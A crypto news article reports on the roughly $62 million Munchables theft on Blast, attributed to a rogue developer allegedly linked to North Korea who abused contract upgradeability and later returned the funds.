Solidity developer 0xQuit shared on X that “the Munchables exploit has been planned since deploy.”
In the late hours of Tuesday, the crypto community saw another exploit. Munchables, the Ethereum Layer-2 NFT gaming platform, reported being compromised, via a post on X.
The cryptocurrency theft, which momentarily stole more than $62 million, took a shocking turn after the identity of the attacker opened a Pandora’s box.
Cryptocurrency Developer Becomes Hacker
Yesterday, Munchables, a gaming platform powered by Blast, suffered a security breach that resulted in the theft of 17,400 ETH, worth around $62.5 million. Immediately following X’s announcement, crypto detective ZachXBT revealed the stolen sum and the address to which the funds had been sent. It was later reported that the cryptocurrency theft had been an inside job rather than an outside job, as one of the project’s developers appeared to be responsible.
The exploit apparently was “not at all complex,” since it consisted of requesting the stolen funds from the contract. However, it required that the attacker be an authorized party, confirming that the heist was a plan carried out within the project. After further investigation, 0xQuit concluded that the attack had been planned since its implementation.
The Munchables developer used the upgradable nature of the contract to “allot themselves a huge balance of ether before changing the contract implementation to one that looked legitimate.” The developer “simply withdrew the balance” when the total value locked (TVL) was high enough. DeFiLlama data shows that before the exploit, Munchables had a TLV of $96.16 million.
Change of Mind or Fear of the Crypto Community?
As ZachXBT suggested, the rogue Munchables developer was North Korean, apparently linked to the Lazarus group. However, the plot thickens, as the blockchain researcher revealed that four different developers hired by the Munchables team were linked to the exploiter, and it seemed like they were all the same person.
These developers recommended each other for work and regularly transferred payments to the same two exchange deposit addresses, funding each other’s wallets. Journalist Laura Shin suggested the possibility that the developers are not the same person but rather different people working for the same entity, the North Korean government.
Pixelcraft Studios CEO added that he had made a trial hire with this developer in 2022. During the month that the former Munchables developer worked for them, he exhibited “sketchy” practices. The CEO believes the North Korean link is possible.
Furthermore, he revealed that the modus operandi was similar back then, as the developer tried to hire “his friend.” The CEO of Pixelcraft commented that, at the time, the developer explained that the nickname was born after his love for the character Gru from the Despicable Me movies. Ironically, the character in question is a supervillain who spends most of the movie trying to steal the moon.
Whether he was trying to steal the moon and failed like Gru, the developer ultimately returned the funds without asking for compensation. Many users believe the suspicious change of heart is due to ZackXBT’s deep dive into the attacker’s web of lies and threats made.
This thriller ends with the cryptocurrency researcher’s response to a now-deleted post. In his response, the detective threatened to destroy the developer and all of his “other North Korean developers who are hard on the chain, their country has another blackout.”
By Audy Castaneda
